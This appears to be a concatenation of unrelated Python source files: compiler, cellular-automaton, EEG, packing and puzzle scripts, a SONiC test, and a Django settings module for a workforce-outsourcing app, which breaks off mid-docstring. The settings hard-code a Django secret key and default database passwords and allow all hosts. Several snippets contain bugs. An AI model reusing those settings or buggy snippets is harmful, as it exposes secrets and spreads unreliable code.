output_projection=None,
):
self.args = args
super().__init__(
TransformerConfig.from_namespace(args),
dictionary,
embed_tokens,
no_encoder_attn=no_encoder_attn,
output_projection=output_projection,
)
def build_output_projection(self, args, dictionary, embed_tokens):
super().build_output_projection(
TransformerConfig.from_namespace(args), dictionary, embed_tokens
)
def build_decoder_layer(self, args, no_encoder_attn=False):
return super().build_decoder_layer(
TransformerConfig.from_namespace(args), no_encoder_attn=no_encoder_attn
)
|
22,473 | 3b248e5a48c92b156b5aa10b951167e79ca37756 | #/usr/bin/env python
# -*- cofing: utf-8 -*-
import os
f=open("config.txt")
fichero=f.read()
lineas=fichero.split("\n")
estados=lineas[0][1:len(lineas[0])-1]
estados=estados.split(",")
nuevos=[]
for e in estados:
nuevos.append(e.replace("\"",""))
estados=nuevos
print estados
alfabeto=lineas[1][1:len(lineas[1])-1]
alfabeto=alfabeto.split(",")
nuevos=[]
for e in alfabeto:
nuevos.append(e.replace("\"",""))
alfabeto=nuevos
print alfabeto
estadoInicial=lineas[2][1:len(lineas[2])-1].replace("\"","")
print estadoInicial
finales=lineas[3][1:len(lineas[3])-1]
finales=finales.split(",")
nuevos=[]
for e in finales:
nuevos.append(e.replace("\"",""))
estadosFinales=nuevos
print finales
nuevos=[]
transiciones=lineas[4][1:len(lineas[4])-1]
for n,e in enumerate(transiciones.split("Transicion {inicio = \"")):
if not e=="" and not e[0]=="\"":
nuevos.append([str(e[0])])
i=0
for n,e in enumerate(transiciones.split("fin = \"")[1:]):
if not e=="" and not e[0]=="\"" and n<=len(nuevos)-1:
nuevos[i].append(e[0])
i+=1
i=0
for n,e in enumerate(transiciones.split("simbolo = \"")[1:]):
if not e=="" and not e[0]=="\""and n<=len(nuevos)-1:
nuevos[i].append(e[0])
i+=1
transicionesNoConexas=nuevos
print transicionesNoConexas
nuevos=[]
i=0
transiciones=lineas[5][1:len(lineas[5])-1]
for n,e in enumerate(transiciones.split("Transicion {inicio = \"")):
if not e=="" and not e[0]=="\"":
nuevos.append([str(e[0])])
i=0
for n,e in enumerate(transiciones.split("fin = \"")[1:]):
if not e=="" and not e[0]=="\"" and n<=len(nuevos)-1:
nuevos[i].append(e[0])
i+=1
i=0
for n,e in enumerate(transiciones.split("simbolo = \"")[1:]):
if not e=="" and not e[0]=="\""and n<=len(nuevos)-1:
nuevos[i].append(e[0])
i+=1
transicionesConexas=nuevos
print transicionesConexas
estadosC=lineas[6][1:len(lineas[6])-1]
estadosC=estadosC.split(",")
nuevos=[]
for e in estadosC:
nuevos.append(e.replace("\"",""))
estadosConexos=nuevos
print estadosConexos
transiciones=transicionesNoConexas
png="conexo"
print "creando grafo"
inicio="subgraph \""+png+"\" { \n"
fin="}"
cuerpo=""
for trans in transiciones :
cuerpo+="\""+png+"-"+trans[0]+"\"->\""+png+"-"+trans[1]+"\"[label=\""+trans[2]+"\"]"+";\n"
finales=""
for e in estadosFinales:
finales+="\""+png+"-"+e+"\"[peripheries=2];\n"
inicial="node [style=invis]; \""+png+"-00\";\n \""+png+"-00\"->\""+png+"-"+estadoInicial+"\";"
f = open (png+"-conf.txt", "w")
f.write(inicio)
f.write(cuerpo)
f.write(finales)
for e in estados:
f.write("\""+png+"-"+e+"\"[label = \""+e+"\"];")
f.write(inicial)
f.write("label = \""+png+"\";")
f.write(fin)
f.close()
#creamos no conexo
transiciones=transicionesConexas
png="Noconexo"
print "creando grafo"
inicio="subgraph \""+png+"\" { \n"
fin="}"
cuerpo=""
for trans in transiciones :
cuerpo+="\""+png+"-"+trans[0]+"\"->\""+png+"-"+trans[1]+"\"[label=\""+trans[2]+"\"]"+";\n"
finales=""
for e in estadosFinales:
finales+="\""+png+"-"+e+"\"[peripheries=2];\n"
inicial="node [style=invis]; \""+png+"-00\";\n \""+png+"-00\"->\""+png+"-"+estadoInicial+"\";"
f = open (png+"-conf.txt", "w")
f.write(inicio)
f.write(cuerpo)
f.write(finales)
for e in estados:
if e in estadosConexos:
f.write("\""+png+"-"+e+"\"[label = \""+e+"\"];")
f.write(inicial)
f.write("label = \""+png+"\";")
f.write(fin)
f.close()
f=open("par-AFD.txt","w")
f.write("digraph{compound=true; \n")
f.close()
os.system("cat conexo-conf.txt >> par-AFD.txt")
f=open("par-AFD.txt","a")
f.write("\n")
f.close()
os.system("cat Noconexo-conf.txt >> par-AFD.txt")
f=open("par-AFD.txt","a")
f.write("\n}")
f.close()
os.system("dot par-AFD.txt -Tpng -o AFD-conexo.png")
os.system("eog AFD-conexo.png && rm par-AFD.txt && rm Noconexo-conf.txt && rm conexo-conf.txt")
|
22,474 | 600ebac9ad7487645b5758ca92c8a43c38270510 | from output.models.ibm_data.valid.s3_4_2_4.s3_4_2_4v13_xsd.s3_4_2_4v13 import Root
obj = Root(
default_attr1=True,
default_attr2=True
)
|
22,475 | aee230320fa1f8340ac526219dc05fb962eb3587 | def Rule(Neighbour_Counts, grid):
newGrid = [[0 for _ in row] for row in grid]
for x, row in enumerate(grid):
for y, cellState in enumerate(row):
aliveNeighboursCount = Neighbour_Counts(x, y)
newCellState = cellState
if cellState == 1:
newCellState = 1
if cellState == 0:
if aliveNeighboursCount == 3:
newCellState = 1
newGrid[x][y] = newCellState
return newGrid |
22,476 | 04041274f106f58cf9f1802dbd9687b3d14d31ca | # -*- coding: utf-8 -*-
class ColoredManaSymbol(object):
YELLOW = '\033[33m'
BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
BLACK = '\033[30m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def color(self, string):
manaCost = ''
for letter in string:
if letter == 'U':
manaCost += self.blue(letter)
elif letter == 'R':
manaCost += self.red(letter)
elif letter == 'W':
manaCost += self.yellow(letter)
elif letter == 'B':
manaCost += self.black(letter)
elif letter == 'G':
manaCost += self.green(letter)
else:
manaCost += letter
return manaCost
def yellow(self, string):
return '{0}{1}{2}'.format(ColoredManaSymbol.YELLOW, string, ColoredManaSymbol.ENDC)
def blue(self, string):
return '{0}{1}{2}'.format(ColoredManaSymbol.BLUE, string, ColoredManaSymbol.ENDC)
def green(self, string):
return '{0}{1}{2}'.format(ColoredManaSymbol.GREEN, string, ColoredManaSymbol.ENDC)
def red(self, string):
return '{0}{1}{2}'.format(ColoredManaSymbol.RED, string, ColoredManaSymbol.ENDC)
def black(self, string):
return '{0}{1}{2}'.format(ColoredManaSymbol.BLACK, string, ColoredManaSymbol.ENDC)
|
22,477 | 8bf6f6dd03eefeb9b31e52dd26707e6d4e441f99 | from collections import namedtuple
User = namedtuple("User", ['name', 'age', 'height', 'edu'])
# 类比定义class
user = User(name='zh', age = 29, height=158)
# 使用tuple 和dict也可以初始化一个实例
user_tuple=('zheng', 23, 190)
user = User(*user_tuple, edu='master')
user_dict = {
"name":"zheng",
"age":32,
"height":179
}
user = User(*user_dict, edu='master')
print(user.age, user.height)
## 可以拆包 |
22,478 | 511c904da847639c3411a42fda0da5b8abda63b1 | class ByteSize:
FIVE = 5
SIX = 6
SEVEN = 7
EIGHT = 8
class Parity:
NOPARITY = 0
ODDPARITY = 1
EVENPARITY = 2
MARKPARITY = 3
SPACEPARITY = 4
class StopBits:
ONESTOPBIT = 0
ONESTOPBITS = 1
TWOSTOPBITS = 2
class fDtrControl:
DTR_CONTROL_DISABLE = 0x00
DTR_CONTROL_ENABLE = 0x01
DTR_CONTROL_HANDSHAKE = 0x02
class BaudRate:
CBR_110 = 100
CBR_300 = 300
CBR_600 = 600
CBR_1200 = 1200
CBR_2400 = 2400
CBR_4800 = 4800
CBR_9600 = 9600
CBR_14400 = 14400
CBR_19200 = 19200
CBR_38400 = 38400
CBR_57600 = 57600
CBR_115200 = 115200
CBR_128000 = 128000
CBR_256000 = 256000 |
22,479 | b0135a5de059c4a33167ad8b0eca82a52e16ef23 | import pytest
import logging
from .cases_sai_ptf import TEST_CASE
from .conftest import get_sai_test_container_name
from .conftest import stop_and_rm_sai_test_container
from .sai_infra import run_case_from_ptf, store_test_result
from .sai_infra import * # noqa: F403 F401
from .conftest import * # noqa: F403 F401
logger = logging.getLogger(__name__)
pytestmark = [
pytest.mark.topology("ptf"),
pytest.mark.sanity_check(skip_sanity=True),
pytest.mark.disable_loganalyzer,
pytest.mark.skip_check_dut_health
]
@pytest.mark.parametrize("ptf_sai_test_case", TEST_CASE)
def test_sai(sai_testbed,
sai_test_env_check,
creds,
duthost,
ptfhost,
ptf_sai_test_case,
request,
create_sai_test_interface_param):
"""
Trigger sai ptf test here.
Args:
sai_testbed: Fixture which can help prepare the sai testbed.
sai_test_env_check: Fixture, use to check the test env.
creds (dict): Credentials used to access the docker registry.
duthost (SonicHost): The target device.
ptfhost (AnsibleHost): The PTF server.
sai_test_case: Test case name used to make test.
request: Pytest request.
create_sai_test_interface_param: Testbed switch interface
"""
dut_ip = duthost.host.options['inventory_manager'].get_host(
duthost.hostname).vars['ansible_host']
try:
sai_test_interface_para = create_sai_test_interface_param
run_case_from_ptf(
duthost, dut_ip, ptfhost,
ptf_sai_test_case, sai_test_interface_para, request)
except BaseException as e:
logger.info("Test case [{}] failed, \
trying to restart sai test container, \
failed as {}.".format(ptf_sai_test_case, e))
pytest.fail("Test case [{}] failed".format(ptf_sai_test_case), e)
finally:
stop_and_rm_sai_test_container(
duthost, get_sai_test_container_name(request))
store_test_result(ptfhost)
|
22,480 | 95bb753726dfa3ff43217dfd817b520b91e2e2f1 | r = input( "Wie oft soll das ding laufen: ")
r = int(r)
g = []
j = []
for x in range(r):
import datetime
endnumber = 10000
start = datetime.datetime.now()
for x in range(endnumber): print(x)
end = datetime.datetime.now()
print("No console Output has been performed")
print("Counted to: "+ str(endnumber))
print("Started: "+ str(start))
print("Ended: "+ str(end))
delta = end - start
deltasec = delta.total_seconds()
deltams = deltasec * 1000
print("Time it took: " + str(deltams)+ "ms")
print("Time it took: " + str(delta))
g.append(delta)
print("Die finalen Werte für for gesammelt:")
for h in g:
print(h)
for y in range(r):
import datetime
endnumber = 10000
x = 0
start2 = datetime.datetime.now()
while x < endnumber:
x = x + 1
print(x)
end2 = datetime.datetime.now()
print("No console Output has been performed")
print("Counted to: "+ str(endnumber))
print("Started: "+ str(start2))
print("Ended: "+ str(end2))
delta2 = end2 - start2
deltasec2 = delta.total_seconds()
deltams2 = deltasec2 * 1000
print("Time it took: " + str(deltams2)+ "ms")
print("Time it took: " + str(delta2))
j.append(delta2)
print("Die finalen Werte für for gesammelt:")
for h in g:
print(h)
print("")
print("Die finalen Werte für while gesammelt:")
for k in j:
print(k) |
22,481 | 0bcea7176d282ff756b62c0d955279dfefb337e4 | # -*- coding: utf-8 -*-
"""
Created on Thu May 12 12:58:59 2016
@author: malz
Function: This is the main program to run for Neurosky data of
"""
import numpy as np
import csv
import random
import os.path as path
import grouper
import brainlib
import sys
vector_resolution=3;
write_path = '/home/malz/workspace_mars/Java_Practice/src'
read_path = '/home/malz/workspace_mars/Java_Practice/src'
#list_of_Users=['User1/Testing','User1/Training','User2/Testing','User2/Training','User3/Testing','User3/Training']
list_of_Users=['User5/Training']
list_of_sessions=['Activity_Two']
list_of_files=['Neurosky/Neurosky.csv.csv']
list_of_filesO=['Neurosky/Neurosky_Fea.csv']
def parse_raw_values (reading):
"make list of power spectra for all raw_values in a list"
# first and last values have { and } attached.
vals = reading['raw_values'].split(',')
vals[0] = vals[0][1:]
vals[len(vals)-1] = vals[len(vals)-1][:-1]
# print np.array(vals).astype(np.float)
# print 'done'
return np.array(vals).astype(np.float)
def spectra (readings):
"Parse + calculate the power spectrum for every reading in a list"
#print [brainlib.pSpectrum(parse_raw_values(r)) for r in readings]
return [brainlib.pSpectrum(parse_raw_values(r)) for r in readings]
def data_path_generator(fol,user_path,session,file1):
temp=str(fol)
return path.join(user_path, temp, str(session),str(file1))
def readAllReadings(reader1):
print 'in second'
for row in reader1:
#print row
yield row
def make_feature_vector (readings): # A function we apply to each group of power spectra
'''
Create 100, log10-spaced bins for each power spectrum.
For more on how this particular implementation works, see:
http://coolworld.me/pre-processing-EEG-consumer-devices/
'''
#for read in readings:
# print read
#print('Done')
#print readings
spect=spectra(readings)
print len(spect[1])
bin=brainlib.binnedPowerSpectra(spect, 100)
print len(bin[2])
#print bin
Y=brainlib.avgPowerSpectrum( bin, np.log10)
print type(Y)
return Y
def readings(filePath):
print 'In readAllreadings'
#print filePath
with open(filePath, 'r') as file:
reader = csv.DictReader(file)
#print reader
# for row in reader:
# print row
#yield row
return [r for r in readAllReadings(reader)]
def featureStep1(read1):
print 'I am here'
groups = grouper.grouper(3, read1)
for g in groups:
readings1 = filter(None, g)
#print len(g)
print '============================================================'
#print readings
#print len(readings1)
# throw out readings with fewer signals than our desired resolution
if len(readings1) == vector_resolution:
yield make_feature_vector(readings1)
def FeatureStore(pathS,arrayOfGen):
list1=list(arrayOfGen)
#print list1
outFile=open(pathS,'wb')
wr=csv.writer(outFile)
wr.writerows(list1)
for i in range (0,1):
for k in range(0,1):
for j in range(0,1):
print list_of_Users[i]+list_of_sessions[k]
print data_path_generator(list_of_Users[i],read_path,list_of_sessions[k],list_of_files[j]);
read1 = readings(data_path_generator(list_of_Users[i],read_path,list_of_sessions[k],list_of_files[j]))
#print read1
#print '==============================================================================================='
arrayOfGen=featureStep1(read1)
FeatureStore(data_path_generator(list_of_Users[i],read_path,list_of_sessions[k],list_of_filesO[j]), arrayOfGen)
#print arrayOfGen
#print read1
print 'Hello'
|
22,482 | e8c8a28e5916f1ae5b7dc65bb33d3474c75e5369 | #!/usr/bin/python
from PIL import Image
import re
img = Image.open("oxygen.png",'r')
row = [img.getpixel((x,img.height/2)) for x in range(img.width)]
# 7 repeat
row = row[::7]
ords = [r for r, g, b, a in row if r == g == b]
#map ascii to values
text = "".join(map(chr, ords))
print (text)
#This list contains strings. Map them to ints before use
next_level_nums = re.findall("\d+", text)
print(next_level_nums)
next_level = "".join(map(chr, map(int, next_level_nums)))
print (next_level)
|
22,483 | 1d02fff2cb87d9e76850094899e5cd1306d7e4ea | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class ServiceType(models.Model):
class Meta():
db_table = 'service_type'
verbose_name = "Тип услуги"
name = models.CharField(max_length=200, verbose_name="Наименование")
def __str__(self):
return self.name
@python_2_unicode_compatible
class Service(models.Model):
class Meta():
db_table = 'service'
verbose_name = "Услуга"
name = models.CharField(max_length=200, verbose_name="Наименование")
description = models.TextField(verbose_name="Описание")
created_date = models.DateTimeField(verbose_name="Дата создания")
service_type = models.ForeignKey(
ServiceType, default=1, verbose_name="Тип услуги")
def __str__(self):
return self.name
|
22,484 | 949fb18f78f48ad8d77bbca45f4510346114f204 | class Recipes(object):
def __init__(self):
self.size = 0
self.first_recipe = None
def __repr__(self):
return "%s" % self.scores
def scores(self):
curr = self.first_recipe
scores = []
for _ in range(self.size):
scores.append(curr.score)
curr = curr.next
return scores
def add_to_end(self, score):
if self.first_recipe is None:
self.first_recipe = Recipe(score, None, None)
else:
last_recipe = self.first_recipe.prev
new_recipe = Recipe(score, last_recipe, self.first_recipe)
last_recipe.next = new_recipe
self.first_recipe.prev = new_recipe
self.size += 1
def print_last_x(self, x):
print_from = self.first_recipe
to_print = []
for _ in range(x):
print_from = print_from.prev
to_print.append(print_from.score)
to_print.reverse()
print to_print
def last_x(self, x):
print_from = self.first_recipe
sequence = ""
for _ in range(x):
print_from = print_from.prev
sequence = str(print_from.score) + sequence
return sequence
class Recipe(object):
def __init__(self, score, prev, next):
self.score = score
self.prev = prev or self
self.next = next or self
def __repr__(self):
return "%s" % self.score
def move_ahead(self, distance=1):
to = self
for _ in range(distance):
to = to.next
return to
def split_digits(digits):
scores = []
if digits == 0:
return [0]
while digits > 0:
scores.append(digits % 10)
digits //= 10
scores.reverse()
return scores
def add_new_recipes(scores, recipes):
scores = split_digits(scores)
for score in scores:
recipes.add_to_end(score)
def part1(num_recipes):
recipes = Recipes()
add_new_recipes(37, recipes)
elf1_recipe = recipes.first_recipe
elf2_recipe = elf1_recipe.next
while recipes.size < (num_recipes + 10):
s1, s2 = elf1_recipe.score, elf2_recipe.score
new_scores = s1 + s2
add_new_recipes(new_scores, recipes)
elf1_recipe = elf1_recipe.move_ahead(s1 + 1)
elf2_recipe = elf2_recipe.move_ahead(s2 + 1)
return ''.join(map(str, recipes.scores()[num_recipes:num_recipes+10]))
# wow did part 2 ever not need these data structures... thought I was doing myself a solid building those XD
def part2(sequence):
recipes = Recipes()
add_new_recipes(37, recipes)
check_size = len(sequence) + 2
elf1_recipe = recipes.first_recipe
elf2_recipe = elf1_recipe.next
finished = False
while not finished:
s1, s2 = elf1_recipe.score, elf2_recipe.score
new_scores = s1 + s2
add_new_recipes(new_scores, recipes)
elf1_recipe = elf1_recipe.move_ahead(s1 + 1)
elf2_recipe = elf2_recipe.move_ahead(s2 + 1)
if sequence in recipes.last_x(check_size):
finished = True
print recipes.size
recipes.print_last_x(check_size)
|
22,485 | 1780e5eb40eae5e62f6171aaa2a658a69141fb8f | import random
class Dice:
@staticmethod
def roll():
return random.choice((1, 2, 3, 4, 5, 6))
d1 = Dice()
d2 = Dice()
print("Dice 1 : ", d1.roll())
print("Dice 2 : ", d2.roll())
print('Random range 0-9: ', random.randrange(10))
lst = [1, 2, 3]
random.shuffle(lst)
print('Random shuffle :', lst)
|
22,486 | d6c8b5bde41b69153d761d62886ed344d834520f | from pyspark.sql import SparkSession
from pyspark.sql.types import IntegerType, LongType, StructField, StructType
import time
s = time.time()
schema = StructType([
StructField("user", IntegerType()),
StructField("movie", IntegerType()),
StructField("rating", IntegerType()),
StructField("time_stamp", LongType())
])
# 1. Initialize spark session
spark = SparkSession \
.builder \
.appName("MovieSimilarities") \
.getOrCreate()
df = spark.read.csv('ml-100k/u.data', sep='\t', ignoreTrailingWhiteSpace=True, inferSchema=True)
# df = df.select('user', 'movie', 'rating')
# df = df.alias('df1').join(df.alias('df2'), 'user', 'inner').select(col('df1.movie').alias('movie1'), col('df2.movie').alias('movie2'),
# col('df1.rating').alias('rating1'), col('df2.rating').alias('rating2'))
# df = df.filter(df['movie1'] < df['movie2'])
# df = df.filter()
df.show()
spark.stop()
e = time.time()
print("Time: %f s" % (e - s))
|
22,487 | 5e95f2130166b5b1094407b38fdf351c36a90009 | import copy
import math
import json
shells = [
{ "_id": 1, "value": 2, "remainingSpace": {"width": 12, "height": 4, "tall": 20} },
{ "_id": 2, "value": 5, "remainingSpace": {"width": 12, "height": 6, "tall": 20} },
]
goods = [
{ "_id": 1, "width": 2, "height": 2, "tall": 15, "quantity": 7, "value": 1, "rotated": False },
{ "_id": 2, "width": 2, "height": 4, "tall": 10, "quantity": 3, "value": 2, "rotated": False },
{ "_id": 3, "width": 3, "height": 2, "tall": 10, "quantity": 3, "value": 5, "rotated": False },
{ "_id": 4, "width": 3, "height": 5, "tall": 25, "quantity": 3, "value": 1, "rotated": False },
]
def rotate(good):
good["width"], good["height"] = good["height"], good["width"]
def get_min_area(g, s, rot=False):
g = copy.deepcopy(g)
if rot:
rotate(g)
column_capacity = s["remainingSpace"]["height"] // g["height"]
placed_goods_per_column = min(column_capacity, g["quantity"])
rows = g["quantity"] // placed_goods_per_column
cols_used = math.ceil(g["quantity"] / placed_goods_per_column)
return s["remainingSpace"]["height"] * cols_used * g["width"]
def placement(shells, goods):
total_shells = []
matrix = []
tallGoods = []
shs = copy.deepcopy(shells) # copy of dict
gds = copy.deepcopy(goods)
shs.sort(key=lambda x: x["value"], reverse=True)
gds.sort(key=lambda x: x["value"] / (x["width"] * x["height"]), reverse=True)
# print(" ".join(map(lambda x: str(x["value"]), goods)))
for sh in shs:
for g in gds:
if g["tall"] > sh["remainingSpace"]["tall"]:
tallGoods.append(g)
continue
is_fit = sh["remainingSpace"]["height"] >= g["height"] and sh["remainingSpace"]["width"] >= g["width"]
is_fit_rotated = sh["remainingSpace"]["width"] >= g["height"] and sh["remainingSpace"]["height"] >= g["width"]
if (is_fit or is_fit_rotated):
if (is_fit and not is_fit_rotated):
rot = False
elif (not is_fit and is_fit_rotated):
rot = True
else:
rot = get_min_area(g, sh, True) < get_min_area(g, sh)
g["rotated"] = rot
if rot:
rotate(g)
column_capacity = sh["remainingSpace"]["height"] // g["height"]
placed_goods_per_column = min(column_capacity, g["quantity"])
cols_used = math.ceil(g["quantity"] / placed_goods_per_column)
for c in range(cols_used):
x = len(matrix)
matrix.append([{"_id": g["_id"], "good": g, "x": x, "y": c, "rotated": rot} if c + 1 <= g["quantity"] else {"_id": None} for c in range(column_capacity)])
placed_goods_per_column = min(column_capacity, g["quantity"])
g["quantity"] -= placed_goods_per_column
sh["remainingSpace"]["width"] -= g["width"]
# print(" ".join(map(lambda x: str(x[id]), matrix[-1])), rot)
if (sh["remainingSpace"]["width"] <= 0):
break
# sh["remainingSpace"]["width"] -= cols_used * g["width"]
else:
print("Good with id = {} doesn't fit.".format(g["_id"]))
if (sh["remainingSpace"]["width"] <= 0):
break
gds = [g for g in gds if g["quantity"] != 0]
# matrix.append([])
total_shells.append({"_id": sh["_id"], "matrix": matrix})
print()
total_shells.sort(key=lambda x: x["_id"])
return json.dumps({"total_shells": total_shells, "tallGoods": tallGoods})
print(placement(shells, goods))
# for p in placement(shells, goods)["total_shells"]:
# print(p)
# return total_shells
# print(total_shells)
# for m in matrix:
# print(" ".join(map(lambda x: str(x[id]), m)))
# for g in goods:
# print(g)
# for t in total_shells:
# for k in t:
# for i in k:
# print(i, end=" ")
# print()
# print() |
22,488 | 6330d4f9891b703ad6bb6f7532546256f3ed002b | from rest_framework import serializers
from .models import Course
class GetAllCourseSerializer(serializers.ModelSerializer):
class Meta:
model = Course
fields = ('id', 'title')
class CourseSerializer(serializers.Serializer):
title = serializers.CharField(max_length=12)
content = serializers.CharField(max_length=12)
price = serializers.IntegerField() |
22,489 | bf08de2b8f7ee907f68b5a99b45cf54826717f6d | """
Copyright 2018 ООО «Верме»
Настройки проекта outsourcing
"""
import os
import logging
import tempfile
from .settings_local import DEBUG
from datetime import timedelta
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i@g+(1qc06b@8ee4*3!f0i9g*28ddsx39gv!nvs9w_(p$)p*cy'
# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG = True
ALLOWED_HOSTS = ['localhost', '127.0.0.1', '*'] # TODO
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'apps.outsource',
'apps.claims',
'apps.shifts',
'apps.employees',
'apps.remotes',
'apps.notifications',
'apps.lib',
'apps.permission',
'apps.config',
'apps.authutils',
'apps.violations',
'apps.easy_log',
'compressor',
'social_django',
'axes',
'saml',
'applogs',
'xlsexport',
'wfm_admin',
'rangefilter',
]
AUTHENTICATION_BACKENDS = (
#'django.contrib.auth.backends.ModelBackend',
'apps.authutils.backends.EmailLoginBackend',
'apps.authutils.backends.UsernameLoginBackend',
'saml.backends.SAMLAuthExt',
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
# WARN: http://breachattack.com/, http://breachattack.com/resources/BREACH%20-%20SSL,%20gone%20in%2030%20seconds.pdf
'django.middleware.gzip.GZipMiddleware',
'social_django.middleware.SocialAuthExceptionMiddleware',
)
ROOT_URLCONF = 'wfm.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'wfm.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'HOST': os.environ.get('WFM_DB_HOST', '127.0.0.1'),
'NAME': os.environ.get('WFM_DB_NAME', 'out_db'),
'USER': os.environ.get('WFM_DB_USER', 'wfm'),
'PASSWORD': os.environ.get('WFM_DB_PASSWORD', 'wfm'),
},
'userlogs': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'HOST': os.environ.get('WFM_DB_HOST', '127.0.0.1'),
'NAME': 'wfm_log',
'USER': os.environ.get('WFM_DB_USER', 'wfm'),
'PASSWORD': os.environ.get('WFM_DB_PASSWORD', 'wfm'),
},
'applogs': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'HOST': os.environ.get('WFM_DB_HOST', '127.0.0.1'),
'NAME': 'app_logs',
'USER': os.environ.get('WFM_DB_USER', 'wfm'),
'PASSWORD': os.environ.get('WFM_DB_PASSWORD', 'wfm'),
},
}
try:
from .settings_local import DATABASES
except ImportError:
pass
DATABASE_ROUTERS = [
'applogs.db_router.LogsDBRouter',
'apps.easy_log.db_router.EasyLogRouter',
'wfm.default_db_router.DefaultDBRouter',
]
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
'OPTIONS': {
'min_length': 6,
}
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'ru-RU'
TIME_ZONE = 'Europe/Moscow'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "static_collected/")
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
MEDIA_URL = '/upload/'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'compressor-cache': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': os.path.join(tempfile.gettempdir(), 'django_compressor_cache'),
'TIMEOUT': None,
'OPTIONS': {
'MAX_ENTRIES': 1000,
},
},
'axes_cache': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
try:
from .settings_local import CACHES
except ImportError:
pass
COMPRESS_CACHE_BACKEND = 'compressor-cache'
COMPRESS_ENABLED = False
try:
from .settings_local import COMPRESS_ENABLED
except ImportError:
pass
LOGIN_URL = '/auth/login/'
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = LOGIN_URL
# -------------------------------------------------------------------------------------------------------------------------
# --------------------------------------------------- АВТОРИЗАЦИЯ ---------------------------------------------------------
# -------------------------------------------------------------------------------------------------------------------------
# Social Auth (social_core/pipeline/__init__.py)
# Доступные способы авторизации
SOCIAL_AUTH_PIPELINE = (
'social_core.pipeline.social_auth.social_details',
'social_core.pipeline.social_auth.social_uid',
'social_core.pipeline.social_auth.auth_allowed',
'social_core.pipeline.social_auth.social_user',
'saml.pipelines.associate_by_name_id',
'social_core.pipeline.social_auth.associate_user',
)
# SAML error handler - ошибка авторизации
SOCIAL_AUTH_LOGIN_ERROR_URL = '/saml/error?type=login-error'
# SAML error handler - блокированный пользователь
SOCIAL_AUTH_INACTIVE_USER_URL = '/saml/error?type=inactive-user'
# SAML error handler - обрыв подключения
#SOCIAL_AUTH_DISCONNECT_REDIRECT_URL = LOGOUT_REDIRECT_URL
# Информация о приложении
SOCIAL_AUTH_SAML_ORG_INFO = {
"en-US": {
"name": "Verme Identity Provider",
"displayname": "Verme Identity Provider",
"url": "https://verme.ru",
}
}
# Контакты технического специалиста.
SOCIAL_AUTH_SAML_TECHNICAL_CONTACT = {
"givenName": "VERME Info",
"emailAddress": "info@verme.ru"
}
# Контакты поддержки
SOCIAL_AUTH_SAML_SUPPORT_CONTACT = {
"givenName": "VERME Support",
"emailAddress": "support@verme.ru",
}
# Общие параметры SAML-протокола
SOCIAL_AUTH_SAML_SECURITY_CONFIG = {
'wantNameId': True,
'wantAttributeStatement': False,
"logoutRequestSigned": True,
"logoutResponseSigned": True,
"signatureAlgorithm": "http://www.w3.org/2001/04/xmldsig-more#rsa-sha256",
}
SOCIAL_AUTH_LOGIN_REDIRECT_URL = '/'
try:
from .social import *
except ImportError:
pass
# Логи
class F(logging.Filter):
""" Этот "фильтр" не фильтрует, а добавляет в объекты record айпи и имя
